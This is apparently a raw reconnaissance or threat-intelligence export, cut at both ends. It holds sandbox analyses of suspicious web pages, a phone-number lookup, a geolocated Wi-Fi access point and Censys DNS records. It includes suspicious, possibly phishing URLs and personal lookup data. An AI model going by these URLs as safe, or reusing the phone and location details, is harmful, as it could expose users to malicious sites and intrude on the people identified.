u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://w.epicedufinder.org/main/https:/www.google.com.hk/async/bgasy"\n Pattern match: "https://w.epicedufinder.org"\n Heuristic match: "cacerts.digicert.com"\n Heuristic match: "GET /DigiCertGlobalRootG2.crt HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: cacerts.digicert.com"\n Pattern match: "www.google.com.hk/async/bgasy"\n Pattern match: 
"https://https:/www.google.com.hk/async/bgasy"\n Pattern match: "https://w.epicedufinder.org/main/https://https:/www.google.com.hk/async/bgasy"\n Pattern match: "https://w.epicedufinder.org/main/https://https:/www.google.com.hk/async/bgasy,timingsV2:{connectEnd:41.41243289612043,connectStart:41.41243289612043,domComplete:3646.0694075488404,domContentLoadedEventEnd:3644.7748906967736,domContentLoadedEven"\n Pattern match: "https://w.epicedufinder.org/main/https://https:/www.google.com.hk/async/bgasy,landingPath:,startTime:1647912420703,siteToken:c022214aaaa34cde9e6a2f9b26b7f9b8,st:2"\n Pattern match: "beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194"\n Pattern match: 172.67.190.129 2022-12-18 00:12:26 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.97.3/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 
performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b40_ConnHashTable<2880>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b40_IESQMMUTEX_0_303"\n "IsoScope_b40_IE_EarlyTabStart_0xcc4_Mutex"\n "IsoScope_b40_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2880"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_303"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.97.3:80"\n "104.18.31.78:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary 
File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "63CJVUP7.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\63CJVUP7.txt]- [targetUID: 00000000-00002832]\n Dropped file: "LM0USI2F.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LM0USI2F.txt]- [targetUID: 00000000-00002880]\n Dropped file: "T1YFWYTS.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T1YFWYTS.txt]- [targetUID: 00000000-00002880]\n Dropped file: "I9G9J455.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I9G9J455.txt]- [targetUID: 00000000-00002832]\n Dropped file: "V5D4L4LK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V5D4L4LK.txt]- [targetUID: 00000000-00002880]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "63CJVUP7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\63CJVUP7.txt]- [targetUID: 00000000-00002832]\n "LM0USI2F.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LM0USI2F.txt]- [targetUID: 00000000-00002880]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._5A1BB117-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF6DA808881895FA0D.TMP" has type "data"- Location: [%TEMP%\\~DF6DA808881895FA0D.TMP]- [targetUID: 00000000-00002880]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 
icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_62DCD38E-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "T1YFWYTS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T1YFWYTS.txt]- [targetUID: 00000000-00002880]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002880]\n "_5A1BB119-765D-11ED-9E1F-08002767FB39_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF6F835D267B734551.TMP" has type "data"- Location: [%TEMP%\\~DF6F835D267B734551.TMP]- [targetUID: 00000000-00002880]\n "~DF5D1A299F27A3DE5A.TMP" has type "data"- Location: [%TEMP%\\~DF5D1A299F27A3DE5A.TMP]- [targetUID: 00000000-00002880]\n "I9G9J455.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I9G9J455.txt]- [targetUID: 00000000-00002832]\n "V5D4L4LK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V5D4L4LK.txt]- [targetUID: 00000000-00002880]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF0964BBE9D2996453.TMP" has type "data"- Location: [%TEMP%\\~DF0964BBE9D2996453.TMP]- [targetUID: 00000000-00002880]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: 
"http://188.114.97.3/"\n Pattern match: "http://188.114.97.3"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.97.3" found in string "http://188.114.97.3/"\n Potential IP "188.114.97.3" found in string "http://188.114.97.3"\n "188.114.97.3"\n Potential IP "188.114.97.3" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.97.3\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'2/92 Antivirus vendors marked sample as malicious (2% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'6390e9ccb71c6170ee5b000d', u'target_url': None, u'interesting': 
False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'suspicious_identifiers': [], u'attck_id': u'T1071.001', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Web Protocols', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mit 188.114.97.3 2022-12-18 00:10:04 BGP AS Membership No URLScan.io 0 0 1 0 None 8075 misogyny.wtf 2022-12-18 00:16:34 Raw Data from RIRs No numverify 0 0 3 0 None {u'international_format': u'+19854014545', u'local_format': u'9854014545', u'number': u'19854014545', u'valid': True, u'line_type': u'landline', u'location': u'Ponchatoul', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} +19854014545 2022-12-18 00:11:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-6329 https://nvd.nist.gov/vuln/detail/CVE-2016-6329 Score: 4.3 Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. 
188.114.97.1 2022-12-18 00:14:32 Country No Country Name Extractor 0 0 3 0 None France +33892556677 2022-12-18 00:04:49 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://celestis.fr/wordpress/readme.php', u'signatures': [{u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" touched "Security Manager" (Path: "HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}")\n "iexplore.exe" touched "Network List Manager" (Path: "HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32")\n "iexplore.exe" touched "MSAA AccPropServices" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\INPROCSERVER32")\n "iexplore.exe" touched "Task Bar Communication" (Path: "HKCU\\CLSID\\{56FDF344-FD6D-11D0-958A-006097C9A090}\\INPROCSERVER32")\n "iexplore.exe" touched "Internet Explorer(Ver 1.0)" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0002DF01-0000-0000-C000-000000000046}\\TREATAS")\n "iexplore.exe" touched "WebBrowserHandler Proxy" (Path: "HKCU\\CLSID\\{3CB169B3-17D9-4E47-8B93-2878998F69A2}\\INPROCHANDLER")\n "iexplore.exe" touched "PSDispatch" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00020420-0000-0000-C000-000000000046}\\INPROCHANDLER")\n "iexplore.exe" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "iexplore.exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS")\n "iexplore.exe" touched "UsersFiles" (Path: 
"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n "iexplore.exe" touched "Shockwave Flash Object" (Path: "HKCU\\CLSID\\{D27CDB6E-AE6D-11CF-96B8-444553540000}\\INPROCSERVER32")\n "iexplore.exe" touched "Property System Both Class Factory" (Path: "HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS")\n "iexplore.exe" touched "Cor MIME Filter, CorFltr, CorFltr 1" (Path: "HKCU\\CLSID\\{1E66F26B-79EE-11D2-8710-00C04F79ED0D}\\TREATAS")\n "iexplore.exe" touched "PSFactoryBuffer" (Path: "HKCU\\CLSID\\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\\TREATAS")\n "iexplore.exe" touched "NetworkListManager" (Path: "HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\\TREATAS")\n "iexplore.exe" touched "WinInetBroker Class" (Path: "HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\\TREATAS")\n "iexplore.exe" touched "CLSID_RecordInfo" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0000002F-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "DAO.DBEngine.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000100-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "DAO.PrivateDBEngine.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000101-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "DAO.TableDef.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000103-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"77.136.123.5:80"\n "77.136.123.5:443"\n "188.114.97.0:443"\n "142.251.33.106:443"\n "104.16.18.94:443"\n "142.251.33.99:80"\n 
"23.45.46.146:80"\n "142.251.33.99:443"\n "23.38.131.139:443"\n "104.18.11.39:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c70_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_c70_IESQMMUTEX_0_519"\n "IsoScope_c70_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3184"\n "IsoScope_c70_IE_EarlyTabStart_0xbcc_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_c70_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c70_ConnHashTable<3184>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"celestis.fr"\n "ocsp.pki.goog"\n "r3.o.lencr.org"\n "cacerts.digicert.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as 
clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"\n "RNA7R9HV.txt" has type "ASCII text"\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"\n "3C428B1A3E5F57D887EC4B864FAC5DCC" has type "data"\n "TKIVNX9V.txt" has type "ASCII text"\n "RecoveryStore._27F18593-7DF9-11EC-AEF4-080027E992C4_.dat" has type "Composite Document File V2 Document Cannot read section info"\n "~DF2FB6FFFB3E028180.TMP" has type "data"\n "en-US.3" has type "data"\n "CabDDD4.tmp" has type "Microsoft Cabinet archive data 61414 bytes 1 file"\n "6A9SQ70I.txt" has type "ASCII text"\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32"\n "web_1_.htm" has type "HTML document ASCII text with CRLF LF line terminators"\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32"\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"\n "~DF7C6C838E22C5BF11.TMP" has type "data"'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-55', u'name': u'Reads the registry for installed applications', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP 
PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE"; Key: "DONTUSEDESKTOPCHANGEROUTER")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE"; Key: "PATH")'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://celestis.fr/wordpress/readme.php"\n Pattern match: "http://celestis.fr"\n Heuristic match: "celestis.fr"\n Heuristic match: "r3.o.lencr.org"\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgRm6ssh%2BibofKx1k1DO%2BLK%2FxA%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"\n Heuristic match: "cacerts.digicert.com"\n Heuristic match: "GET /DigiCertGlobalRootG2.crt HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: cacerts.digicert.com"\n Pattern match: "https://proapkgame.com/wp-includes/certificates/dsajlkwqe/web/"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Exploit/Shellcode', u'origin': u'Registry Access', u'identifier': u'registry-65', u'name': u'Reads the Equation Editor Class Identifier (CLSID)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" 
(Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0003000B-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0002CE02-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021700-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" (Path: "HKLM\ 188.114.97.0 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None linksys (Net ID: 00:01:24:F2:17:BC) 37.7803446,-122.3906132 2022-12-18 00:21:02 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-17T23:14:05.428Z", "ip": "104.21.28.240", "location_updated_at": "2022-12-14T10:04:49.134613Z", "autonomous_system_updated_at": "2022-12-10T05:38:48.859882Z", "location": {"coordinates": {"latitude": 0.0, "longitude": 0.0}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "", "timezone": ""}, "dns": {"records": {"xn--malmrrmokare-7ibb.se": {"record_type": "A", "resolved_at": "2022-12-01T00:42:19.809470653Z"}, "backronseri.gq": {"record_type": "A", "resolved_at": "2022-12-09T14:49:44.361052586Z"}, "wrisinukilor.tk": {"record_type": "A", "resolved_at": "2022-12-13T17:54:16.568563925Z"}, "quitranar.ml": {"record_type": "A", "resolved_at": "2022-12-07T15:46:34.241206539Z"}, "tilburg-zonnepaneel.nl": {"record_type": "A", "resolved_at": "2022-11-29T16:34:05.587034691Z"}, "johnparkeraesthetics.com": {"record_type": "A", "resolved_at": "2022-12-14T13:44:36.052499508Z"}, "lagostechweek.ng": {"record_type": "A", "resolved_at": "2022-12-05T16:40:44.108614046Z"}, "new.dalvinder.xyz": {"record_type": "A", "resolved_at": "2022-12-15T17:22:59.386173414Z"}, "efileperm.com": {"record_type": "A", "resolved_at": "2022-12-09T13:18:47.471783046Z"}, "relugamredilib.gq": {"record_type": "A", "resolved_at": 
"2022-12-06T07:51:56.412624431Z"}, "riseboro.org": {"record_type": "A", "resolved_at": "2022-12-04T17:01:30.547466207Z"}, "update.wpvivid.com": {"record_type": "A", "resolved_at": "2022-12-06T04:51:56.379698765Z"}, "gaseabenzla.tk": {"record_type": "A", "resolved_at": "2022-11-26T17:07:07.854117382Z"}, "mail.wikimachine.com": {"record_type": "A", "resolved_at": "2022-11-30T14:18:44.375120883Z"}, "www.riseboro.org": {"record_type": "A", "resolved_at": "2022-12-05T16:46:55.187302730Z"}, "mail.theerathornnft.com": {"record_type": "A", "resolved_at": "2022-12-03T14:17:00.724883711Z"}, "consuggtolacar.tk": {"record_type": "A", "resolved_at": "2022-12-08T16:57:17.976506713Z"}, "odometr-service.ru": {"record_type": "A", "resolved_at": "2022-11-12T16:16:47.125205972Z"}, "fototayland.ru": {"record_type": "A", "resolved_at": "2022-12-11T16:48:25.638065248Z"}, "cdoubrafonachaw.tk": {"record_type": "A", "resolved_at": "2022-12-02T17:25:42.344474226Z"}, "www.campcarter.net": {"record_type": "A", "resolved_at": "2022-12-04T15:50:56.630416250Z"}, "cpcontacts.sectraexpress.com": {"record_type": "A", "resolved_at": "2022-11-29T13:58:34.097869492Z"}, "gsb.group": {"record_type": "A", "resolved_at": "2022-12-10T14:35:16.342630588Z"}, "neva.news": {"record_type": "A", "resolved_at": "2022-12-11T16:31:31.034925098Z"}, "cpcalendars.tahiti.gg": {"record_type": "A", "resolved_at": "2022-12-11T14:53:44.553983019Z"}, "mulsoftbobarepterp.ga": {"record_type": "A", "resolved_at": "2022-12-08T14:48:35.058360655Z"}, "fight4996teach.xyz": {"record_type": "A", "resolved_at": "2022-11-23T20:58:19.180247238Z"}, "persiapanmasukptn.com": {"record_type": "A", "resolved_at": "2022-12-03T13:54:49.453799338Z"}, "cpcontacts.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-10T12:12:10.879895874Z"}, "holistic-holidays.com": {"record_type": "A", "resolved_at": "2022-11-20T13:29:50.235437517Z"}, "manandmeats.useweb.site": {"record_type": "A", "resolved_at": 
"2022-12-13T17:49:12.982758140Z"}, "naier.online": {"record_type": "A", "resolved_at": "2022-12-13T17:27:23.874365019Z"}, "bongocat.click": {"record_type": "A", "resolved_at": "2022-09-28T12:37:32.167148526Z"}, "www.hubenglish.com": {"record_type": "CNAME", "resolved_at": "2022-11-12T13:23:00.315871231Z"}, "naburlanerin.tk": {"record_type": "A", "resolved_at": "2022-12-07T16:01:30.972320927Z"}, "mail.batonrougekennelclub.com": {"record_type": "A", "resolved_at": "2022-12-11T13:12:16.359208221Z"}, "myretroorgy.com": {"record_type": "A", "resolved_at": "2022-12-11T13:48:14.610197155Z"}, "www.multpaineis.com.br": {"record_type": "A", "resolved_at": "2022-12-13T12:17:18.074275378Z"}, "cpanel.sectraexpress.com": {"record_type": "A", "resolved_at": "2022-12-09T14:02:13.774105248Z"}, "cpcalendars.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-16T12:14:10.984577406Z"}, "webminders.it": {"record_type": "A", "resolved_at": "2022-12-04T15:14:16.127245896Z"}, "emnilut.tk": {"record_type": "A", "resolved_at": 